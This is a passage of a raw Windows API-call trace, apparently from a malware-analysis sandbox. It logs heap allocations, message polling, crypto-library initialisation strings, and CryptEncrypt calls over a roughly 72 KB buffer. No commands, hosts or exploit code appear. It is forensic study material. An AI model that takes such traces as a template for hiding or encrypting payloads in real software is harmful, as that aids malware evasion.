0x7da3e8 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.601] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.602] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.603] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.605] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.606] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.606] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.606] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.606] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.606] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.606] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.606] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.607] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.607] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.608] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x11cf8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x11d00) returned 1 [0041.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.608] CharLowerBuffW (in: lpsz="byte[72961]", cchLength=0xb | out: lpsz="byte[72961]") returned 0xb [0041.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.609] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.609] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x958a08*, pdwDataLen=0x6ae220*=0x11cf8, dwBufLen=0x11d00 | out: pbData=0x958a08*, pdwDataLen=0x6ae220*=0x11d00) returned 1 [0041.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.610] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.610] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.610] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.610] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.611] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.611] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.611] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.611] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.611] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, 